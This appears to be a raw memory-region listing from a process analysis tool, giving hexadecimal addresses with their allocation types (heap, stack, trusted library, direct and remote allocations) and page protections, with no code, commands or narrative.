page read and write
D68DBFB000
stack
page read and write
74B0000
trusted library allocation
page read and write
43EE000
unkown
page read and write
56E000
stack
page read and write
9640000
trusted library allocation
page read and write
4E78000
heap
page read and write
9740000
trusted library allocation
page read and write
BABB000
trusted library allocation
page read and write
20565A15000
heap
page read and write
9BE0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
8430000
direct allocation
page read and write
9670000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
86C4000
trusted library allocation
page read and write
87A0000
unkown
page read and write
6CD2EFE000
stack
page read and write
9940000
trusted library allocation
page read and write
2BC0000
trusted library allocation
page read and write
5ABD000
trusted library allocation
page read and write
4CE2000
heap
page read and write
2138FCA0000
heap
page read and write
87A0000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
7530000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
1AFA6451000
heap
page read and write
7A24000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
3567000
heap
page read and write
9635000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
20565013000
heap
page read and write
9780000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
1B0000
remote allocation
page read and write
9630000
trusted library allocation
page read and write
2056A670000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9817000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
B40B000
trusted library allocation
page read and write
174FA44F000
heap
page read and write
22E3000
heap
page read and write
99C0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
2F94000
heap
page read and write
187C725D000
heap
page read and write
9810000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
5EFB000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
304E000
unkown
page read and write
7BBE000
stack
page read and write
4EFE000
stack
page read and write
2D8F000
unkown
page read and write
9660000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
3FF0000
unkown
page execute and read and write
82BC000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
9815000
trusted library allocation
page read and write
87A5000
trusted library allocation
page read and write
21390970000
trusted library allocation
page read and write
6C40000
direct allocation
page read and write
5AD4000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
9970000
trusted library allocation
page read and write
2D3AB300000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
467D000
trusted library allocation
page read and write
BBA6000
trusted library allocation
page read and write
B406000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
2761000
direct allocation
page read and write
4654000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
7F6E0000
unkown
page read and write
9930000
trusted library allocation
page read and write
463B000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9635000
trusted library allocation
page read and write
536D000
trusted library allocation
page execute and read and write
8270000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
525E000
stack
page read and write
A5D0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
487000
unkown
page write copy
9810000
trusted library allocation
page read and write
810E000
stack
page read and write
9BB0000
trusted library allocation
page read and write
A87D000
stack
page read and write
9666000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
4D62000
heap
page read and write
2BD0000
trusted library allocation
page read and write
88BC000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
A30000
remote allocation
page read and write
82D2000
trusted library allocation
page read and write
95F3000
trusted library allocation
page read and write
493000
unkown
page readonly
53CE000
heap
page read and write
9710000
trusted library allocation
page read and write
487000
unkown
page write copy
7720000
trusted library allocation
page read and write
4648000
trusted library allocation
page read and write
D68D5EF000
stack
page read and write
9940000
unkown
page read and write
95D0000
trusted library allocation
page read and write
9815000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
8270000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
2D3AB400000
heap
page read and write
A8F000
stack
page read and write
95F5000
trusted library allocation
page read and write
8710000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
174FA454000
heap
page read and write
BBC5000
trusted library allocation
page read and write
A600000
trusted library allocation
page read and write
E4600F7000
stack
page read and write
827D000
trusted library allocation
page read and write
5A7B000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
88A5000
unkown
page read and write
9860000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
7740000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
86D8000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
4656000
trusted library allocation
page read and write
88D5000
unkown
page read and write
9740000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
96E0000
unkown
page read and write
88D0000
unkown
page read and write
487000
unkown
page write copy
9840000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
5BCA000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
9648000
unkown
page read and write
9AB0000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
5A38000
trusted library allocation
page read and write
98C0000
unkown
page read and write
588E000
trusted library allocation
page read and write
5D0000
trusted library allocation
page read and write
174FA483000
heap
page read and write
98F0000
trusted library allocation
page read and write
87A0000
unkown
page read and write
9A00000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
21390910000
trusted library allocation
page read and write
87A5000
trusted library allocation
page read and write
300F000
unkown
page read and write
8370000
trusted library allocation
page read and write
7950000
trusted library allocation
page read and write
2BC0000
heap
page read and write
9840000
trusted library allocation
page read and write
4CCD000
heap
page read and write
99F0000
trusted library allocation
page read and write
87A0000
unkown
page read and write
A5D0000
trusted library allocation
page read and write
20565B18000
heap
page read and write
539C000
heap
page read and write
5B27000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
2138FCEA000
heap
page read and write
27B5DE29000
heap
page read and write
9637000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
4E3E000
stack
page read and write
88D6000
trusted library allocation
page read and write
2056A8B5000
heap
page read and write
9820000
trusted library allocation
page read and write
5290000
direct allocation
page read and write
9810000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
20565B58000
heap
page read and write
BE7C000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9AB0000
unkown
page read and write
98F0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9BA0000
trusted library allocation
page read and write
5270000
direct allocation
page read and write
2056A7A0000
trusted library allocation
page read and write
223A2428000
heap
page read and write
9950000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
7A20000
trusted library allocation
page read and write
C70C000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
376E000
unkown
page read and write
77A0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9BA0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
74D0000
trusted library allocation
page execute and read and write
95D0000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
9635000
unkown
page read and write
2A9E000
stack
page read and write
A5E8000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
46FA000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
2056AA21000
trusted library allocation
page read and write
9920000
unkown
page read and write
82FB000
trusted library allocation
page read and write
BC43000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
87A5000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
443C000
stack
page read and write
63B23F7000
stack
page read and write
87A0000
trusted library allocation
page read and write
C20000
remote allocation
page read and write
9630000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
334E000
stack
page read and write
8315000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
363A000
heap
page read and write
9A10000
trusted library allocation
page read and write
2D3AB508000
heap
page read and write
9918000
trusted library allocation
page read and write
88A8000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
9C000
stack
page read and write
7920000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
35A8000
heap
page read and write
48FF000
stack
page read and write
3440000
heap
page read and write
174FA452000
heap
page read and write
6CD307A000
stack
page read and write
88D0000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
87A0000
unkown
page read and write
6CD27FB000
stack
page read and write
1B0000
remote allocation
page read and write
9CEC000
unkown
page read and write
629B67E000
stack
page read and write
88C5000
unkown
page read and write
9630000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
9636000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
BC16000
trusted library allocation
page read and write
91D000
stack
page read and write
2290000
heap
page read and write
8790000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
74C0000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
9BF6000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
2056A7C0000
trusted library allocation
page read and write
80A0000
trusted library allocation
page read and write
8331000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
187C7200000
heap
page read and write
223A2370000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
1AFA62D0000
heap
page read and write
9760000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
B432000
trusted library allocation
page read and write
2138FE10000
heap
page read and write
87A2000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9A0F000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
87A0000
unkown
page read and write
8830000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
88C6000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
A77B000
stack
page read and write
9810000
trusted library allocation
page read and write
76F0000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
99D0000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
8490000
trusted library allocation
page read and write
CA2DBFF000
stack
page read and write
53E7000
heap
page read and write
5B72000
trusted library allocation
page read and write
88B0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
20566230000
trusted library section
page readonly
9640000
unkown
page read and write
2138FC70000
heap
page read and write
27B5E802000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page read and write
A600000
trusted library allocation
page read and write
9B70000
trusted library allocation
page read and write
8710000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
205665F0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
3560000
heap
page read and write
9740000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
53D5000
heap
page read and write
90E000
stack
page read and write
493000
unkown
page readonly
95D0000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
2056AA60000
trusted library allocation
page read and write
8370000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
4645000
trusted library allocation
page read and write
5E9C000
trusted library allocation
page read and write
2D3AB45F000
heap
page read and write
7F00000
trusted library allocation
page read and write
9B00000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
3CB0000
unkown
page read and write
52A4000
direct allocation
page read and write
7590000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
4D5D000
heap
page read and write
9730000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
4640000
trusted library allocation
page read and write
516E000
stack
page read and write
99B0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9637000
trusted library allocation
page read and write
5ACB000
trusted library allocation
page read and write
9480000
trusted library allocation
page execute and read and write
88C0000
trusted library allocation
page read and write
86C0000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
8280000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
187C724C000
heap
page read and write
9B80000
trusted library allocation
page read and write
21390C40000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
99B5000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
7640000
trusted library allocation
page read and write
B897000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
99B0000
trusted library allocation
page read and write
A600000
trusted library allocation
page read and write
1AFA6500000
heap
page read and write
99F0000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
88C0000
unkown
page read and write
6CD29FA000
stack
page read and write
99C0000
trusted library allocation
page read and write
52E000
stack
page read and write
88C0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
2056A5F0000
trusted library allocation
page read and write
53AD000
heap
page read and write
9840000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
2D3AB190000
heap
page read and write
87A5000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
5201000
direct allocation
page read and write
95D0000
trusted library allocation
page read and write
A630000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
34E2000
unkown
page read and write
9655000
trusted library allocation
page read and write
7A81000
heap
page read and write
B3FC000
trusted library allocation
page read and write
88C5000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
2AED000
stack
page read and write
981A000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
174FA488000
heap
page read and write
BB18000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
5373000
trusted library allocation
page read and write
99D0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
88C0000
unkown
page read and write
9960000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9A00000
unkown
page read and write
330E000
stack
page read and write
76F0000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
174FA47B000
heap
page read and write
9780000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
4DA3000
heap
page read and write
9A10000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
286F000
heap
page read and write
8880000
trusted library allocation
page read and write
BB0F000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
839000
stack
page read and write
B5D0000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
2D3AB43C000
heap
page read and write
9770000
trusted library allocation
page read and write
9A70000
trusted library allocation
page read and write
956E000
stack
page read and write
9490000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
9470000
unkown
page read and write
9BE0000
trusted library allocation
page read and write
7A90000
heap
page read and write
9830000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
99B0000
trusted library allocation
page read and write
187C724F000
heap
page read and write
98C0000
trusted library allocation
page read and write
9A4D000
trusted library allocation
page read and write
974B000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
3930000
unkown
page read and write
B419000
trusted library allocation
page read and write
2833000
direct allocation
page read and write
9710000
trusted library allocation
page read and write
2896000
heap
page read and write
9730000
trusted library allocation
page read and write
88D0000
unkown
page read and write
5380000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
A600000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
87A8000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
1AFA6476000
heap
page read and write
994E000
trusted library allocation
page read and write
21390980000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
9B74000
trusted library allocation
page read and write
9607000
trusted library allocation
page read and write
87A0000
unkown
page read and write
9740000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
9485000
trusted library allocation
page read and write
A5D6000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
2C4F000
unkown
page read and write
77D0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
5250000
direct allocation
page read and write
6C67000
direct allocation
page read and write
A5E0000
trusted library allocation
page read and write
187C7250000
heap
page read and write
9710000
trusted library allocation
page read and write
A5F0000
trusted library allocation
page execute and read and write
20565062000
heap
page read and write
A8FE000
stack
page read and write
9BE0000
trusted library allocation
page read and write
536F000
stack
page read and write
7650000
trusted library allocation
page read and write
774D000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
88D0000
unkown
page read and write
95F0000
trusted library allocation
page read and write
364A000
heap
page read and write
9655000
unkown
page read and write
9960000
trusted library allocation
page read and write
834F000
trusted library allocation
page read and write
8270000
trusted library allocation
page read and write
5EA4000
trusted library allocation
page read and write
2D3AB45A000
heap
page read and write
629B9F9000
stack
page read and write
9740000
trusted library allocation
page read and write
52C0000
direct allocation
page read and write
2841000
direct allocation
page read and write
2056B000000
heap
page read and write
9717000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9644000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
8710000
trusted library allocation
page read and write
87A0000
unkown
page read and write
98E0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
5A6B000
trusted library allocation
page read and write
99C0000
unkown
page read and write
7A20000
trusted library allocation
page read and write
3DB0000
unkown
page readonly
285F000
heap
page read and write
2138FCE4000
heap
page read and write
BD63000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
4BEF000
stack
page read and write
A638000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
487000
unkown
page write copy
28BC000
heap
page read and write
C725000
trusted library allocation
page read and write
B5F0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
C20000
remote allocation
page read and write
B610000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
63B22FB000
stack
page read and write
963C000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
86E8000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
88A0000
unkown
page read and write
BBCD000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
8750000
trusted library allocation
page read and write
834F000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
7FCC0000
direct allocation
page read and write
9710000
trusted library allocation
page read and write
478E000
stack
page read and write
9630000
trusted library allocation
page read and write
6C0000
heap
page read and write
A5D0000
trusted library allocation
page read and write
84F000
stack
page read and write
9830000
trusted library allocation
page read and write
B3FB000
trusted library allocation
page read and write
847D000
direct allocation
page read and write
88C0000
trusted library allocation
page read and write
97A0000
unkown
page read and write
99C0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
176CB77000
stack
page read and write
98D0000
trusted library allocation
page read and write
99F2000
trusted library allocation
page read and write
4D4F000
heap
page read and write
5C0000
heap
page read and write
6C20000
direct allocation
page read and write
74C0000
trusted library allocation
page read and write
7910000
trusted library allocation
page execute and read and write
97A0000
trusted library allocation
page read and write
4CD0000
heap
page read and write
9880000
unkown
page read and write
2056A8EE000
heap
page read and write
4D36000
heap
page read and write
4D20000
heap
page read and write
4C80000
remote allocation
page read and write
4654000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
1AFA645C000
heap
page read and write
88C0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
860000
remote allocation
page read and write
2824000
direct allocation
page read and write
A73E000
stack
page read and write
95D0000
trusted library allocation
page read and write
6CD327F000
stack
page read and write
98D0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
4C70000
heap
page read and write
5392000
trusted library allocation
page read and write
B6A0000
trusted library allocation
page read and write
9760000
trusted library allocation
page execute and read and write
20565000000
heap
page read and write
6CD26FB000
stack
page read and write
9BE0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
77E0000
trusted library allocation
page read and write
4D36000
heap
page read and write
74D0000
trusted library allocation
page read and write
99C0000
unkown
page read and write
9810000
trusted library allocation
page read and write
BC1E000
trusted library allocation
page read and write
5AAD000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
9650000
unkown
page read and write
A8BE000
stack
page read and write
9960000
trusted library allocation
page read and write
43B0000
heap
page read and write
1AFA6481000
heap
page read and write
99C0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
86E6000
trusted library allocation
page read and write
9644000
unkown
page read and write
9650000
trusted library allocation
page read and write
9B70000
trusted library allocation
page read and write
B3EC000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
174FA47C000
heap
page read and write
35B5000
heap
page read and write
8830000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
9670000
trusted library allocation
page read and write
B424000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
5601000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
4310000
trusted library allocation
page read and write
176CC7F000
stack
page read and write
2056A830000
heap
page read and write
B444000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
2138FE15000
heap
page read and write
87A0000
trusted library allocation
page read and write
5288000
heap
page read and write
E4601FE000
stack
page read and write
9950000
trusted library allocation
page read and write
88C6000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
7610000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
8710000
trusted library allocation
page read and write
77C0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
4CD9000
heap
page read and write
7960000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
174FA48C000
heap
page read and write
9740000
trusted library allocation
page read and write
5A9B000
trusted library allocation
page read and write
87AD000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
9640000
unkown
page read and write
9470000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
9630000
unkown
page read and write
8870000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
8750000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
50591000
unkown
page execute read
9780000
trusted library allocation
page read and write
6BA6000
direct allocation
page read and write
9960000
trusted library allocation
page read and write
5386000
trusted library allocation
page execute and read and write
95F0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
97E8000
unkown
page read and write
A619000
trusted library allocation
page read and write
88D5000
trusted library allocation
page read and write
2887000
heap
page read and write
9640000
trusted library allocation
page read and write
205659A0000
trusted library section
page read and write
2829000
heap
page read and write
516E000
stack
page read and write
63B207E000
stack
page read and write
6CC0000
heap
page read and write
2056AAD0000
trusted library allocation
page read and write
87A0000
unkown
page read and write
76F0000
trusted library allocation
page read and write
860000
remote allocation
page read and write
8850000
trusted library allocation
page read and write
9AE0000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
2056A790000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
CA2D3EC000
stack
page read and write
9B56000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
2138FCEC000
heap
page read and write
E45FFFB000
stack
page read and write
4CEB000
heap
page read and write
9940000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
6C78000
direct allocation
page read and write
88D0000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9830000
unkown
page read and write
87A0000
trusted library allocation
page read and write
2056AA0E000
trusted library allocation
page read and write
223A2402000
heap
page read and write
76D0000
trusted library allocation
page read and write
8760000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
4D3D000
heap
page read and write
C20000
remote allocation
page read and write
4D9C000
heap
page read and write
9635000
trusted library allocation
page read and write
88A0000
unkown
page read and write
4CA0000
heap
page read and write
400000
unkown
page readonly
88C0000
trusted library allocation
page read and write
87A0000
unkown
page read and write
9FE000
stack
page read and write
A5D0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
A6BE000
stack
page read and write
75F0000
trusted library allocation
page read and write
54FF000
stack
page read and write
87A0000
trusted library allocation
page read and write
174FA500000
heap
page read and write
8850000
trusted library allocation
page read and write
523E000
stack
page read and write
88D0000
trusted library allocation
page read and write
2D3AB461000
heap
page read and write
95D0000
trusted library allocation
page read and write
223A246E000
heap
page read and write
74F0000
trusted library allocation
page read and write
9649000
unkown
page read and write
9620000
trusted library allocation
page read and write
350D000
stack
page read and write
88A0000
trusted library allocation
page read and write
87A7000
trusted library allocation
page read and write
2056AAF0000
remote allocation
page read and write
97C0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
3FDA000
unkown
page read and write
88C0000
trusted library allocation
page read and write
97A5000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
5370000
trusted library allocation
page read and write
8740000
trusted library allocation
page read and write
9B70000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
B620000
trusted library allocation
page read and write
99D0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
5350000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
A30000
remote allocation
page read and write
87A0000
trusted library allocation
page read and write
51AE000
stack
page read and write
9A00000
trusted library allocation
page read and write
4E3D000
stack
page read and write
506F000
stack
page read and write
96E5000
trusted library allocation
page read and write
87A0000
unkown
page read and write
53C7000
heap
page read and write
174FA3D0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
53E7000
heap
page read and write
88C0000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
964F000
trusted library allocation
page read and write
5363000
trusted library allocation
page execute and read and write
9630000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
223A2423000
heap
page read and write
3880000
unkown
page read and write
88A0000
unkown
page read and write
9810000
trusted library allocation
page read and write
6CD2DFF000
stack
page read and write
9BD0000
trusted library allocation
page read and write
9470000
unkown
page read and write
99F0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
52D2000
direct allocation
page read and write
176C53B000
stack
page read and write
9630000
trusted library allocation
page read and write
23C0000
heap
page read and write
99D0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
33C8000
heap
page read and write
435E000
stack
page read and write
87A5000
trusted library allocation
page read and write
7480000
trusted library allocation
page read and write
A0C000
stack
page read and write
9960000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
87A0000
unkown
page read and write
A5D0000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
BC4B000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
A5E0000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
88D0000
unkown
page read and write
9700000
unkown
page read and write
8750000
trusted library allocation
page read and write
88A0000
unkown
page read and write
9A07000
trusted library allocation
page read and write
5397000
trusted library allocation
page execute and read and write
7BFE000
stack
page read and write
4D28000
heap
page read and write
9630000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
87A0000
